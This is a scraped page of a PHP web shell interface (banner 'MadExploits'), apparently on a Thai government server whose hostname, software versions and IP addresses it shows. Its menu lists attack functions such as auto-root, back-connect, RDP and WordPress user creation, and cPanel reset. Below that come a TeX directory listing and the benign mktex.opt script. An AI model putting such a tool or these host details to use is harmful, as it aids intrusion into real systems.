Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
texmf /
web2c /
[ HOME SHELL ]
Name
Size
Permission
Action
aleph.pool
30.08
KB
-rw-r--r--
amiga-pl.tcx
5.2
KB
-rw-r--r--
cp1250cs.tcx
1
KB
-rw-r--r--
cp1250pl.tcx
5.44
KB
-rw-r--r--
cp1250t1.tcx
4.95
KB
-rw-r--r--
cp227.tcx
3.42
KB
-rw-r--r--
cp852-cs.tcx
985
B
-rw-r--r--
cp852-pl.tcx
5.63
KB
-rw-r--r--
cp8bit.tcx
2.93
KB
-rw-r--r--
empty.tcx
603
B
-rw-r--r--
fmtutil.cnf
6.11
KB
-rw-r--r--
il1-t1.tcx
5.24
KB
-rw-r--r--
il2-cs.tcx
986
B
-rw-r--r--
il2-pl.tcx
5.44
KB
-rw-r--r--
il2-t1.tcx
5
KB
-rw-r--r--
kam-cs.tcx
920
B
-rw-r--r--
kam-t1.tcx
895
B
-rw-r--r--
macce-pl.tcx
5.77
KB
-rw-r--r--
macce-t1.tcx
5.64
KB
-rw-r--r--
maz-pl.tcx
5.87
KB
-rw-r--r--
mf.pool
21.68
KB
-rw-r--r--
mktex.cnf
71
B
-rw-r--r--
mktex.opt
4.65
KB
-rw-r--r--
mktexdir
1.34
KB
-rwxr-xr-x
mktexnam
7.6
KB
-rwxr-xr-x
mktexnam.opt
3.73
KB
-rw-r--r--
mktexupd
1.7
KB
-rwxr-xr-x
natural.tcx
2.25
KB
-rw-r--r--
omega.pool
29.43
KB
-rw-r--r--
pdftex.pool
38.59
KB
-rw-r--r--
tcvn-t5.tcx
3.31
KB
-rw-r--r--
tex.pool
26.23
KB
-rw-r--r--
texmf.cnf
27.04
KB
-rw-r--r--
updmap.cfg
6.66
KB
-rw-r--r--
viscii-t5.tcx
3.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mktex.opt
# mktex.opt -- common mktex* options, etc. # Meant to be sourced after $usage, $version, and $MT_TEXMFMAIN have been set. # # te@dbs.uni-hannover.de and kb@mail.tug.org. Public domain. # $Id: mktex.opt,v 1.36 2005/01/21 19:17:01 olaf Exp $ if test "x$1" = x--help || test "x$1" = x-help; then echo "$usage" exit 0 elif test "x$1" = x--version || test "x$1" = x-version; then echo "`basename $0` $version" kpsewhich --version exit 0 elif test $# -lt ${mt_min_args-1}; then echo "$0: Missing argument(s)." >&2 echo "Try \``basename $0` --help' for more information." >&2 exit 1 elif test $# -gt ${mt_max_args-1}; then num=$# while test $# -gt `expr $num - ${mt_max_args-1}`; do shift; done echo "$0: Extra arguments $*." >&2 echo "Try \``basename $0` --help' for more information." >&2 exit 1 fi # MS-DOS and MS-Windows define $COMSPEC or $ComSpec and use `;' to separate # directories in path lists whereas Unix uses `:'. Make an exception for # Cygwin, which pretends to be UNIX. # Create a variable that holds the right character to be used by the scripts. DOSISH=no case `uname -s` in CYGWIN*|Cygwin*|cygwin*) ;; *) if test -n "$COMSPEC" || test -n "$ComSpec"; then DOSISH=yes; fi esac if test "$DOSISH" = "no"; then SEP=':'; else SEP=';';fi # TEMPDIR needs to be unique to each process because of the possibility of two # people running dvips (or whatever) simultaneously. if test -n "$TMPDIR"; then TEMPDIR="${TMPDIR}/mt$$.tmp" else TEMPDIR="/tmp/mt$$.tmp" fi # We want to output only filenames to standard output, but it's too # error-prone to write the scripts that way, so we direct stdout here. STDOUT="$TEMPDIR/mt$$.out" # We will change search paths to include $KPSE_DOT. This is necessary # since we cd to $TEMPDIR. : ${KPSE_DOT=`pwd`}; export KPSE_DOT # Clean up on normal or abnormal exit. # The "cd /" is for MS-DOS and MS-Windows, where there is a separate # current directory on each drive, and therefore "cd $KPSE_DOT" might # still leave $TMPDIR current directory on its drive, in which case it # cannot be removed. trap 'rc=$?; cd /; cd "$KPSE_DOT"; test -f "$STDOUT" && cat "$STDOUT"; rm -rf "$TEMPDIR"; exit $rc' \ 0 1 2 3 7 13 15 (umask 077 && mkdir "$TEMPDIR") || exit 1 cd "$TEMPDIR" || exit 1 # The alternative location for fonts. The directory need not exist, # so we use --expand-var here. We also perform a sanity check. : ${MT_VARTEXFONTS=`kpsewhich --expand-var='$VARTEXFONTS' | sed 's%^!!%%'`} if test -z "$MT_VARTEXFONTS"; then echo "$0: VARTEXFONTS is not defined. Defaulting to \`$KPSE_DOT'." >&2 MT_VARTEXFONTS='$KPSE_DOT' fi # The supporting scripts: : ${MT_MKTEXNAM=`kpsewhich --format='web2c files' mktexnam`} test -n "$MT_MKTEXNAM" || MT_MKTEXNAM="$MT_TEXMFMAIN/web2c/mktexnam" : ${MT_MKTEXNAM_OPT=`kpsewhich --format='web2c files' mktexnam.opt`} test -n "$MT_MKTEXNAM_OPT" || MT_MKTEXNAM_OPT="$MT_TEXMFMAIN/web2c/mktexnam.opt" : ${MT_MKTEXDIR=`kpsewhich --format='web2c files' mktexdir`} test -n "$MT_MKTEXDIR" || MT_MKTEXDIR="$MT_TEXMFMAIN/web2c/mktexdir" : ${MT_MKTEXDIR_OPT=`kpsewhich --format='web2c files' mktexdir.opt`} test -n "$MT_MKTEXDIR_OPT" || MT_MKTEXDIR_OPT="$MT_TEXMFMAIN/web2c/mktexdir.opt" : ${MT_MKTEXUPD=`kpsewhich --format='web2c files' mktexupd`} test -n "$MT_MKTEXUPD" || MT_MKTEXUPD="$MT_TEXMFMAIN/web2c/mktexupd" # mktexupd and mktexlsr make sure they're coordinated via this. A copy of # the first string is found in mktexlsr. ls_R_magic='% ls-R -- filename database for kpathsea; do not change this line.' # Old ls-R files should continue to work. old_ls_R_magic='% ls-R -- maintained by MakeTeXls-R; do not change this line.' # Read defaults from mktex.cnf if that file exists. Can be used to # overwrite anything defined below. Please use the same syntax as # given here (e.g. ``: ${MODE=ljfour}'', not just ``MODE=ljfour'', as # this can cause trouble (e.g. when the mode for mktexnam is # already specified on the command line). : ${MT_MKTEX_CNF=`kpsewhich --format='web2c files' mktex.cnf`} test -n "$MT_MKTEX_CNF" && test -r "$MT_MKTEX_CNF" && . "$MT_MKTEX_CNF" # Possible features: appendonlydir dosnames fontmaps nomfdrivers nomode # stripsupplier striptypeface texmfvar varfonts. if test "$DOSISH" = "yes"; then : ${MT_FEATURES=appendonlydir:dosnames} else : ${MT_FEATURES=appendonlydir} fi : ${MODE=ljfour} : ${BDPI=600} : ${DPI=600} : ${MAG=1.0} : ${ps_to_pk=gsftopk} # some prefer ps2pk # Allow fonts to be read and written (especially in case we make # directories) by everyone. umask 0 # Cache values that may be useful for recursive calls. export MT_MKTEX_OPT MT_MKTEX_CNF export MT_MKTEXNAM MT_MKTEXNAM_OPT export MT_MKTEXDIR MT_MKTEXDIR_OPT export MT_MKTEXUPD export MT_TEXMFMAIN MT_VARTEXFONTS
Close